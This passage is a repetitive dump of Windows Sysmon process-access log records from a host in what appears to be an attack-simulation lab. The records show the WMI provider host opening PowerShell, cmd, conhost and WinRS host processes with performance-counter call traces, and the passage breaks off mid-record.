13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005145Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005144Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E300-000000009101}2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005143Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E300-000000009101}2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005142Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E200-000000009101}4748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005141Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E200-000000009101}4748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005140Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E100-000000009101}1184C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005139Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E100-000000009101}1184C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005138Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E000-000000009101}3324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005137Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E000-000000009101}3324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005136Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-DF00-000000009101}3196C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005135Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-DF00-000000009101}3196C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005134Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005133Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005132Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005131Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005130Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program 